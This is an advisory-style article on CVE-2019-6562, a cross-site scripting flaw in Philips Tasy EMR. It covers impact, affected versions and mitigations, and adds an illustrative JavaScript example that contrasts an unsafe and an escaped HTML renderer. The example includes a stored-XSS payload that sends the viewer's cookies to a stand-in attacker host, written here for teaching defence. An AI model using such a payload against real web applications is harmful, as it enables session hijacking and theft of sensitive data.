Philips has a mitigation plan for a cross-site scripting vulnerability in its Tasy EMR, according to an advisory coordinated with NCCIC.
Successful exploitation of this vulnerability, discovered by security researcher Rafael Honorato, could impact or compromise patient confidentiality and system integrity.
Netherlands-based Philips’ analysis has shown that this issue, if fully exploited, may allow attackers of low skill located at the customer site or connected over a VPN to provide unexpected input to the application, execute arbitrary code, alter the intended control flow of the system, and access sensitive information.
Tasy EMR, a clinical and administrative workflow-based information system, is affected in versions 3.02.1744 and prior.
The vulnerability is an improper neutralization of user-controllable input before it is placed in output that is used as a web page served to other users, so script supplied by one user can run in the browsers of other users who view the affected page.
CVE-2019-6562 is the identifier assigned to this vulnerability, which has a CVSS v3 base score of 4.1.
The product is used mainly in the healthcare and public health sectors, and is deployed primarily in Brazil and Mexico.
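The failure pattern described above, stored input rendered into a page for other users without being neutralized, as an added example that is not code from Tasy EMR or from Philips. The clinical-note scenario, the in-memory store, the `saveNote`/`renderNotes*` functions and the payload are all hypothetical and constructed for illustration; the vulnerable renderer is shown next to the hardened one.

```javascript
// Added example (not Tasy EMR or Philips code): a minimal stored-XSS pattern
// (CWE-79) and its fix. Scenario is hypothetical: a note saved by one user is
// rendered into an HTML list that other users view.

const notes = []; // constructed in-memory store standing in for a database

function saveNote(author, text) {
  notes.push({ author, text });
}

// VULNERABLE: stored user input is concatenated straight into HTML markup, so a
// note containing a <script> tag is interpreted as code by every viewer.
function renderNotesUnsafe() {
  return notes
    .map((n) => `<li><b>${n.author}</b>: ${n.text}</li>`)
    .join('');
}

// Neutralize the five characters that change meaning in an HTML text or
// quoted-attribute context. Other contexts (inline JavaScript, URLs, CSS)
// need their own encoding; this helper is only correct for HTML body/attribute text.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED: every user-controlled value is escaped at the point it enters HTML.
function renderNotesSafe() {
  return notes
    .map((n) => `<li><b>${escapeHtml(n.author)}</b>: ${escapeHtml(n.text)}</li>`)
    .join('');
}

// Crude detector used only to show the difference between the two renderers:
// does the produced markup still contain a live <script ...> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload: exfiltrates the viewer's cookies to an attacker host.
const PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Populate the store with a benign note and the malicious one, then render both ways.
function demo() {
  notes.length = 0;
  saveNote('nurse01', 'Patient stable, vitals normal.');
  saveNote('lowpriv', PAYLOAD);
  return { unsafe: renderNotesUnsafe(), safe: renderNotesSafe() };
}

const result = demo();
console.log('unsafe markup still contains a script tag:', containsScriptTag(result.unsafe));
console.log('safe markup still contains a script tag:  ', containsScriptTag(result.safe));
```

Output escaping is the fix for this bug class; input validation on the way in is a useful second layer but does not replace it, because the same value may later be emitted in a context the validator never considered.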
No known public exploits specifically target this vulnerability. This vulnerability is not exploitable remotely.
Philips recommends that users follow the instructions in the product configuration manual and not expose Tasy EMR to the Internet without a VPN. Users are also advised to stay on one of the three most recently released versions of the product, following the Tasy EMR release schedule, and to apply service packs as soon as possible. Hosted deployments are patched automatically; on-premise deployments are notified of changes to the system via the release notes.
Users with questions regarding Tasy EMR should follow the service procedure and open a service order to Philips.
The Philips product security website carries the latest security information for Philips products.